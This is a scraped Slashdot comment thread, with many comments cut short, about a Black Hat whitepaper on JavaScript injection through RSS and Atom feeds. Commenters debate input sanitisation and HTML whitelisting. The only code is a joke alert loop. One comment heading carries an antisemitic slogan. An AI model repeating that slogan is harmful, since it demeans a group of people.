RSS and Web Feeds a Risk? 94
A followup whitepaper [PDF] to a
recent talk at the blackhat security conference has been released outlining the risks associated with web based feeds such as RSS and Atom. From the article: "Attackers could exploit the problem by setting up a malicious blog and enticing a user to subscribe to the RSS feed. More likely, however, they would add malicious JavaScript to the comments on a trusted blog, Auger said. "A lot of blogs will take user comments and stick them into their own RSS feeds," he said."
Huh? (Score:5, Insightful)
Re:Huh? (Score:1, Insightful)
Re:Huh? (Score:3, Insightful)
That is not to say that the feed can not contain HTML characters, a deiscription "Microsoft says the <a> tag to be depreciated in Vista" is fully valid but should be treated as plain text, *not* html.
Sites which take
Re:Huh? (Score:2)
Rich
Re:Huh? (Score:2, Insightful)
You could have stopped here, and have been even more correct.
Re:Huh? (Score:2)
Re:Huh? (Score:1)
Re:Huh? (Score:4, Informative)
Quite annoying if you ask me. It shouldn't be executed if the script tag or javascript: doesn't exist.
That's why I always use a form of bbcode instead of html for comment forms.
Re:Huh? (Score:2)
PHP is limiting the way you consider solving the problem. Just because strip_tags() doesn't do the trick for MSIE doesn't mean there's no reliable way. This is the function PHP needs to bundle in its standard library. [slashdot.org]
Re:Huh? (Score:2)
Furthermore, your approach relies on a pr
Re:Huh? (Score:1)
Re:Huh? (Score:2)
That sounds pretty fallacious. Try again?
What was it that the post the parent linked to said? Ah yes: "The cause is not thinking of and treat
Re:Huh? (Score:2)
You don't seem to understand what I proposed. I'm describing building a whitelist of allowable HTML elements in a document. And advising you to make informed decisions on whether to support certain elements and attributes, erring on the side of not supporting them for the sake of security.
As an example, many know that Javascript can be included, legally, in CSS. Let's say we're implementing the
Re:Huh? (Score:3, Interesting)
The second issue is with the "allowed tags" attribute of strip_tags. You may think to yourself that allowing , , tags, etc. is pretty harmless. Except that there's st
Re:Huh? (Score:2)
Re:Huh? (Score:1)
Re:Huh? (Score:2, Interesting)
The second issue is with the "allowed tags" attribute of strip_tags. You may think to yourself that allowing <b>, <i>
Re:Huh? (Score:2)
Re:Huh? (Score:3, Interesting)
The question is... (Score:2)
Re:The question is... (Score:1)
Hardly something new... (Score:2)
That's hardly news.
Re:Huh? (Score:1)
Old technique, new medium (Score:5, Insightful)
Nobody would think of performing no kind of checking on things submitted into a plain old text box, so why would it be safe just because it's now in the "synergetic web 2.0 blogosphere of community-driven empowerment through technology"
Oh well, still a moderately interesting article...
Re:Old technique, new medium (Score:5, Informative)
Exactly. This is a minor variation on the same old mistakes web developers usually make. It's just that a lot of developers seem to have forgotten that Atom and RSS feeds need to be sanitised just as much as any other untrusted input.
This is by no means a new concept; off the top of my head, I remember Mark Pilgrim [diveintomark.org] talking about this three years ago, and I remember thinking how damn obvious it was back then and being surprised that it was news to people.
I think one of the contributing factors is that a lot of borderline incompetent developers have learned to sanitise form input not because they understand the problem, but because they've simply had it hammered into their heads that they need to sanitise stuff that comes in through forms. Given a different form of input with exactly the same problem, they don't recognise that they need to sanitise it because it's not coming in through a form. They haven't learned why the problem exists, they've just memorised "form data == sanitise".
Re:Old technique, new medium (Score:5, Interesting)
So in the real world, a lot of sensible developers understand the problem with risky external input, although lots of baby-developers haven't had enough experience to get jaded and never trust users. Security thoughts come from age and being cynical.
But either way, the Web2.0 look irks me
Re:Old technique, new medium (Score:1)
So.. (Score:5, Insightful)
just because something is some kind of "new" technology does not mean any different..
use common sense and intelligence.
So..Carry and cash. (Score:1, Funny)
Excuse me, Tracer. You can keep the underwear.
Re:So.. (Score:5, Funny)
Re:So.. (Score:2)
Re:So.. (Score:2, Insightful)
Re:RSS Feed: Jews are the enemy! (Score:4, Funny)
Re:RSS Feed: Jews are the enemy! (Score:1)
Bloglines (Score:3, Informative)
Heh (Score:5, Funny)
Re:Heh (Score:2)
Yeah, Slashdot's RSS feature banned me a few times, too.
Re:Heh (Score:2, Funny)
Re:Heh (Score:1)
Why are you still using dial-up?
What sensible feed aggregator allows javascript? (Score:3, Insightful)
Someone please reassure me that Vista's aggregator does so as well. In fact, can anyone even refer to an aggregator that parses and enables javascript? I can't begin to think of where to find one.
Re:What sensible feed aggregator allows javascript (Score:3, Insightful)
From the article:
They don't name names, but it does seem like a number of aggregators do support JavaScript. And when the day comes where someone develops a "Web 2.0 AJAX enabled blog", there will be pressure for more and more aggregators to support JavaScript (likely it
Re:What sensible feed aggregator allows javascript (Score:2)
Re:What sensible feed aggregator allows javascript (Score:2)
Bottom line is RSS readers must be as tight as tight web browsers (that is preferably not based on IE).
Re:What sensible feed aggregator allows javascript (Score:2)
They saw it coming! (Score:3, Insightful)
What about Microsoft? (Score:1)
Re:What about Microsoft? (Score:2)
Since most people (me excluded) use pre-fabbed blog tools like Wordpress or online blog services, most feeds should already be sanitized.
Microsoft just have to make browser and email security a top issue in Vista, and disable most services (especially automatic execution) by def
don't trust input (Score:2)
RSS feeds shouldn't trust input from other systems, javascript & html should be filtered out.
or to simplify, no program should trust input of any type (user input, data from files, data from databases) validate and filter it before using it. If it isn't a cross-script problem it's a buffer overflow problem.
The slides can be found here (Score:3, Informative)
RSS Security Slides [cgisecurity.com]
#4 on the Threatdown - Refrigerators (Score:2)
Validation is the only problem (Score:3, Insightful)
The technology behind web feeds such as RSS and Atom (if you can call an XML file a 'technology') is perfectly safe, it is merely the content of the feed itself which can cause problems.
No one can stop a malicious user from setting up their own feed containing dangerous feeds. However, for existing blogs and weblogs, the validation methods to prevent the input of code and script into comment fields has been around and known about for several years.
Re:Validation is the only problem (Score:2)
I'm only using feeds like FoxNews, Google News, Yahoo News, CNN News, and of course, Slashdot. There are 13 in Opera, and 9 in Firefox.
The user can quickly set up additional feeds, I am sure. These may link to sites that are not trusted, I suppose.
Here [blogspot.com]
Can't be that high risk. (Score:1)
Simple rule for input (Score:4, Insightful)
You're missing the point - it's about the "reader" (Score:3, Insightful)
The bottom line here is that RSS/Atom reader programs need to apply similar security checks to those performed by popular secure web browsers.
RTFA
Oh God (Score:5, Insightful)
I can write virii in C++! It's a C++ vulnerability!
Seriously, this is dumb. It is not a problem with RSS/Atom, it is a problem with RSS/Atom viewers that allow JavaScript code to be executed!
Within the context of a web-based viewer this could be a problem, but then again it's no more of a problem than if you go to a questionable site with bad JavaScript. For a browser-based viewer it's simply a matter of the devs remembering to turn off JavaScript support for RSS/Atom feeds.
And in desktop-based viewers... I mean really, who would be stupid enough to even consider implementing JavaScript in one. And if it only does because the programmer took the lazy route and is using a WebControl in the background, well they might want to consider a different method that will actually give them some measure of CONTROL.
Speaking of poorly coded, I wonder if we'll see IE exploits arising from embedded ActiveX controls in RSS feeds, those would cause far more damage than while (1) { window.print(); window.alert("LOL INTERNET"); }.
Re:Oh God (Score:1, Offtopic)
Except that it CAN be virii (Score:2)
Re:Except that it CAN be virii (Score:3, Insightful)
VIRII is NOT a word.
Re:Except that it CAN be virii (Score:1, Insightful)
You do realise that Wikipedia isn't an authorative source, don't you? And even if you trust Wikipedia as a source, if you read further [wikipedia.org]:
Re:Oh God (Score:2)
Feed formats are a vector for vulnerability. The proper analogy isn't "C++ is evil," it is "throwing feeds on your site without sanitization is as bright as running arbitrary executables from the Internet."
Pulling the Javascript, plugin, and ActiveX junk out of arbitrary XML data is much less trivial than "remembering to turn off JavaScript support." There is no such check box. This is apparently hard to get right, judging by the rash of XSS bugs. There needs to be the equivalent of such a check box i
Bogus (Score:5, Funny)
Re:Bogus (Score:1)
Just encode it, that's what I do (Score:2, Insightful)
Re:Just encode it, that's what I do (Score:2)
I don't know how to read XML document templates well enough. Can anyone confirm or deny if the elements are supposed to be able to contain HTML markup or whether they should be treated as plain text?
Rich
Re:Just encode it, that's what I do (Score:1)
Re:Just encode it, that's what I do (Score:2)
Then again, there are situations where you may want to output HTML that has been input. That is easier to decide on the output side of things
Re:Just encode it, that's what I do (Score:1)
However, in my case it's not applicable. Maybe I should have clarified from the start that I'm working on an RSS Reader (a SharePoint web part derived from this one [asp.net]). So my content comes from feeds, not a database.
Color me stupid... (Score:5, Interesting)
And, as someone above suggested, what the hell is a "Web 2.0" RSS feed? Even if I used AJAX to make a nice-n-pretty UI for my blog, that still wouldn't explain why I would use JavaScript for my RSS feed.
Re:Color me stupid... (Score:1)
Re:Color me stupid... (Score:2)
Isn't the whole point of XML to provide the raw content in a simple format? Seems to me "less is more".
Unless... (Score:2)
Instinct says no.
In Case You Wanted RSS Comments ... (Score:2, Informative)
Blogger [blogger.com] doesn't (directly) support comment feeds. If you're interested in setting this up on your Blogspot blog (so you can, for example, get truly recent comments [editthis.info]), check out this bloghacking wiki [editthis.info].
I can't vouch for the security of these methods, though.
-Thetan.
Re:In Case You Wanted RSS Comments ... (Score:2)
I blog with malice! (Score:2)
Mood: h4xx0r
elmer FUD (Score:1)
Podcast files could contain virusses (Score:2)
Just predicting next week's USA Today exclusive.
Isn't the problem client side? (Score:1)
Not a big deal right now (Score:1)
Suscribing to a RSS feed isn't what the average user do, and I don't think you'd do it without realizing. Most people won't even have a RSS reader installed.
But wait until Vista have mass adoption. It'll have RSS everywhere and average users will start to use it. Then there will be a problem.
I told you so (Score:2)
Oh, my, now it turns out that RSS feeds have a potential vulnerability. What a surprise! Imagine now if RSS inherently had links deep within your OS.
Applications should be separated from the OS an
How about an example of malicious javascript? (Score:1)
Cheers
Matt
Re:How about an example of malicious javascript? (Score:1)
That's one example off the top of my head. I don't see how this relates to RSS feeds, but examples of malicious javascript injections are definitely out there.